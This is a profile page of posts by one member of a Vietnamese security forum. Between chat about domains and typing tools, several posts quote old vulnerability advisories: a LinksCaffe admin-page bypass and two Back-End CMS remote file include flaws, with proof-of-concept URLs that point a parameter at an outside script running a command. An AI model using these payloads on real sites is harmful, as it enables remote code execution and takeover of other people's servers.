banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: H0angY3nXinhdep  XML
Profile for H0angY3nXinhdep Messages posted by H0angY3nXinhdep [ number of posts not being displayed on this page: 0 ]
 
Những cơ bản này có ích cho những ai bước đầu tìm hiểu lập trình hay kiểm soát hệ thống, cái này chắc có trong giáo trình của các trường CNTT nhỉ? Còn sợ nó nguy hiểm thì cũng không hẳn vì tool tự viết virus khá nhiều , và cũng nguy hiểm không kém (trên máy đơn). IT rất là rộng, không ai hiểu được hết mọi thứ, không phải ai cũng hiểu về lập trình, cũng như 90% mọi người ở đây không biết hết cách trang trí văn bản excel chuyên nghiệp vậy
www.html.con.vn cũng hay đấy chứ? BQT xin 1 cái được đó smilie
Gonafish.com LinksCaffe 3.0 is free link indexing directory, we found that the file admin1953.php can be accessed directly to get full administration rights without password and username.

Proof of exploit:

http://www.example.com/[path_to_linksCaffe]/Admin/admin1953.php

Or the images of mirror

http://vietnamsecurity.googlepages.com/1.JPG

http://vietnamsecurity.googlepages.com/2.JPG

http://vietnamsecurity.googlepages.com/3.JPG

Affected

LinksCaffe 2.0, 3.0, Pro no test

Fix : Easy to fix, just put checker to the file

http://www.securityfocus.com/archive/1/444636/30/0/threaded
NETSOL có bug, sớm hay muộn hvaonline.net cũng mất thôi, vì tính không chắc chắn của domain.com mà HVA không liên quan tới, Theo HY các anh nên dùng hvaonline.vn để làm domain chính thức, hoặc hvaonline.net.vn để làm dự phòng, hvaonline.net nếu có thì nên chạy về là đủ, các anh muốn không bị sóng gió quá nhiều xin làm như vậy là yên tâm cho các mem nhất
Chẳng ai tự ti cả, VN có hàng tá người phát hiện bug ý chứ, tuy nhiên phát hiện thật thì phải công bố và credit rõ ràng lên securityfocus hay tracker để mọi người kiểm chứng
smilie , các bạn là hacker chẳng lẽ chưa vô 1 cái host nào mà không soi được config sao?
Ngoài ra còn 1 lỗi nữa nè


# jpcache.php: line 40
#
# ---
# $includedir = $_PSL['classdir'] . "/jpcache";
# ---
#
# Proof of concept:
#
# Back-end have a default path pre-set on jpcache.php,
# and cracker can execute a remote command.
#
# http://example/[be_path]/class/jpcache/jpcache.php?_PSL[classdir]=http://example/cmd.php?exec=uname



Topic : Back-End CMS <= 0.7.2.2 (BE_config.php) Remote Include Vulnerability

ExploitAlert Id : 633

Credit : Kacper

Date : 27.5.2006
Download


Exploit Code :

################# DEVIL TEAM THE BEST POLISH TEAM ##################
#
# Back-End CMS - Remote File Include Vulnerabilities
# Find by Kacper (Rahim).
# Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
# Site of script: http://www.back-end.org
#
####################################################################
*/

BE_config.php Line 27-31:

Code:
...
// Script timer
require_once($_PSL['classdir'] . '/BE_phpTimer.class');
$scriptTimer = & pslSingleton('phpTimer');
$scriptTimer->start('main');
/* Use Example
...



/*

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/[Back-End_path]/BE_config.php?_PSL[classdir]=[evil_scripts]

#Elo smilie


ExploitAlert Id : 633

Credit : Kacper
http://securityreason.com/exploitalert/633
Date : 27.5.2006
Bạn Dũnglà chủ nhân hồi nào vậy?
chúc mừng HVA come back, Y gõ TV bằng bộ gõ của forum sao chưa được vậy? F1 đến f12 liền mấy lần không được, đành dùng Vietkey
 

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|